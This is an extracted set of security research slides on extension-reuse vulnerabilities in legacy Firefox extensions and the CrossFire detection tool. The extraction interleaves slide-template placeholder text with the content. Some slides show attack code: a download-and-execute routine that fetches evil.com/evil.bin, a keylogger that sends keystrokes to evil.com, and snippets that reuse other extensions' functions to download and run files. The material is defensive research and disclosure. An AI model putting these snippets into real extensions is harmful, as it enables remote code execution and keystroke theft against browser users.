Automated Detection of Firefox Extension- • Click to edit Master textReuse styles Vulnerabilities — Second level • Third level — Fourth level » Fifth level Ahmet S BUYUKKAYHAN William ROBERTSON Who are we? •• Assistant Click to professor edit Master of computer text science styles at Northeastern University— Second in Boston, level MA • Co-directs• Third the level NEU Systems Security Lab with Engin Kirda • Systems,— network, Fourth level and software security researcher • Past winner »of FifthDEFCON level CTF with Shellphish – (a long, long time ago…) 2 Who are we? •• PhD Click Candidate to edit at MasterNortheastern text University styles –— Authored Second peer-reviewed level conference and journal papers in top-tier security• Third venues level • Member —of Fourththe NEU level Systems Security Lab » Fifth level 3 Singapore • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 4 Boston • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 5 Agenda • Click to edit Master text styles • Background— Second level • Extension-Reuse• Third level Attacks — Fourth level • CrossFire» & Fifth Demo level • Evaluation • Conclusion 6 • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Background Browser Extensions • Click to edit Master text styles • Add new capabilities, — Second level customization to browsers • Third level • ~15K extensions in Mozilla — Fourth level Add-ons repository » Fifth level • Popular ones have millions of users • Mostly written in JavaScript 8 Legacy Firefox Extensions •• Shared Click JavaScript to edit Masternamespace text styles –— Extensions Second can read/writelevel objects or variables of others – Can• invoke Third functionality level of others • Shared window — Fourth level XUL XUL XUL – Read/write GUI» Fifthelements level – Listen to all events JavaScript • No privilege separation XPCOM – Full access to filesystem, network… File System Network 9 Threat Model • Click to edit Master text styles • The browser is an attractive target –— Extension Second authors level are untrusted • Vulnerable• Third extensions level can be exploited – “Benign-but-buggy” threat model — Fourth level • Malicious extensions are a real threat » Fifth level – Trick users into installing malicious 161 malicious extensions extensions are blocked – Powerful (“man-in-the-browser” attacks) by Mozilla+ – Easy to develop, difficult to detect + https://addons.mozilla.org/en-US/firefox/blocked/ – Feb 2016 10 Existing Methods for Protection •• Enforcing Click to browser edit Master text styles marketplaces— Second forlevel extensions – Automated• Third analysis level – Human— reviews Fourth level – Extension signing» Fifth level – “Vetting” • Extension isolation – Least privilege and policy-based enforcement 11 Add-on SDK (a.k.a., Jetpack) • Click to edit Master text styles • Introduced in 2009 — Second level October 2014 • Isolates• Third extensions level from each other 12.0% of the top 2,000 • Separate— content Fourth level and core scripts March 2016 • Implements» principle Fifth level of least 22.9% of the top 2,000 privilege Release Date of • But, adoption has been slow WebExtensions in Q3 2016 • Superseded by WebExtensions 12 • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Extension-Reuse Attacks Attack Model • Click to edit Master text styles Evil Extension — SecondEvil Extension level (No• ThirdSensitive level Calls) — Fourth level Extension X Extension Y No Suspicious Behavior » Fifth level Sensitive Calls Sensitive Calls Vetting Sandbox Victim`s Browser 14 Impact •• Lack Click of isolation to edit leaves Master legacy text styles extensions— Second defenseless level against capability• Third leaks level • Attackers— can Fourth stitch level together exploits by abusing» Fifth level capabilities • The more power vulnerable extensions have, the easier it is for an evil extension 15 Download & Execute Evil Binary const• ClickWebBrowserPersist to edit= Master text styles Components.Constructor( —"@mozilla.org/embedding/browser/nsWebBrowserPersist;1" Second level , "nsIWebBrowserPersist"); var persist• = ThirdWebBrowserPersist level (); var targetFile—= Fourth level Components.classes» Fifth["@mozilla.org/file/local;1" level ] .createInstance(Components.interfaces.nsILocalFile); targetFile.initWithPath(“evil.bin"); persist.saveURI( “http://evil.com/evil.bin", null, null, null, "", targetFile, null); targetFile.launch(); 16 Extension-reuse Attack Example • Click to edit Master text styles Extension var files = [{ — Second level href: $url, description: "", Download • Third level Execute fname: $path, noRedir: true Extension X — Fourth levelExtension Y }]; » Fifth level gFlashGotService.download(files); var gPrefMan = new GM_PrefManager(); Internet File gPrefMan.setValue(“editor”, $path); System GM_util.openInEditor(); Exe 17 To Reuse or Not To Reuse const• ClickWebBrowserPersist to edit = Master textvar files styles = [{ Components.Constructor("@mozilla.org href: $url, /embedding/browser/nsWebBrowserPersi — Second level description: "", st;1", "nsIWebBrowserPersist"); var persist• = ThirdWebBrowserPersist level (); fname: $path, var targetFile —= Fourth level noRedir: true Components.classes["@mozilla.org/fil }]; e/local;1"].createInstance» Fifth (Componentlevel gFlashGotService.download(files); s.interfaces.nsILocalFile); targetFile.initWithPath($path); var gPrefMan = new GM_PrefManager(); persist.saveURI($url, null, null, gPrefMan.setValue(“editor”, $path); null, "", targetFile, null); GM_util.openInEditor(); targetFile.launch(); 18 Another Example •• A Clickkey logger, to edit which Master sends each text key styles press to evil.com gd12.dicInline.urlWikPrefix— Second level = "http://evil.com/GD12_YOUR_LANG/steal.php?key="; gd12.keydownHandler = function(e) { gd12.dicInline.lookupWikt(String.fromCharCode(e.which),• Third level false, false); }; — Fourth level gd12.init(); » Fifth level Evil.com Internet 19 • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level CrossFire CrossFire Overview • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 21 DEMO • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 22 • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Evaluation Method •• Top Click 10 most to editdownloaded Master extensions text styles –— Manual Second analysis level on all set • Top 2000• Third most level downloaded extensions – Manual— analysis Fourth levelon random set of 323 • Case Study» Fifth level – Developed an extension with cross- extension function call – Applied to full review 24 Top 10 Firefox Extensions •Extension Click Name to edit Automated Master Exploits text Manual Exploitsstyles False Positives # of Users Adblock Plus 0 0 4 22 M Video— DownloadHelper Second 0level 15 0 6.5 M Firebug• Third level 0 1 0 3 M NoScript— Fourth 2 level 5 2 2.5 M DownThemAll!» Fifth 0 level 5 0 1.5 M Greasemonkey 1 3 2 1.5 M Web of Trust 1 33 15 1.3 M Flash Video Down. 4 1 1 1.3 M FlashGot Mass Down. 3 5 9 1.3 M Down. YouTube Videos 0 2 1 1 M 25 Summary of Results •Detected Click Vulnerabilities to edit – Random Master Set text Positivestyles Vulnerabilities by Attack Type —True Second Positives Falselevel Positives Manual Automated • Third level —96 Fourth level 51 20% 27% » Fifth level 255 204 73% 80% 26 Breakdown of Positive Vulnerabilities • Click to edit Master text stylesCategory Description Positive Vulnerabilities By Category File I/O Code Execution Execute binary or JS — Second16% level Event Listener Registration • Third level File I/O Read from/write to 12% Filesystem — Fourth level Network Access Open a URI or download a Preference file Access » Fifth level Preference Access Read/write browser 3% settings Code Execution Event Listener Reg. Key logging events only 3% Network Access 66% 27 Performance •• Fast Click static to analysis edit Master text styles –— ~ 1 Second sec average level (per extension) Min• Third Q1 level Median Mean Q3 Max 0.05s— Fourth 0.18s level 0.28s 1.06s 0.51s 763.91s » Fifth level • Fast exploit generation – ~ 380 secs (~ 6 mins) on average (per exploit) Min Q1 Median Mean Q3 Max 30s 192s 270s 378.6s 550.8 2160s 28 Case Study •• ValidateThisWebSite Click to edit Master text styles –— ~50 Second lines of code level – No• obfuscation Third level or attempt to hide — Fourth level – Opens unnecessary » Fifth level harmless link // Attacker chooses $url noscriptBM.placesUtils.__ns.__global__.ns. loadErrorPage(window[1], $url); 29 Limitations •• CrossFire Click to is editnot a Mastersound and text precise styles analysis tool — Second level • CrossFire• Third does level not handle – Inferring— dynamic Fourth level types – Prototype-based» Fifth inheritance level – String evaluation 30 Mitigation & Detection •• Isolation Click to edit Master text styles • Least— Second privilege level • Secure• Thirdfunctionality level and data sharing • Check for— extension-reuse Fourth level vulnerabilities » Fifth level • Mozilla security team is informed 31 Key Takeaways • Click to edit Master text styles • Lack of isolation allows stealthy attacks — Second level • Attackers can easily automate • Third level • More robust— Fourth isolation, level vetting, and analysis required » Fifth level 32 Thank You • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 33.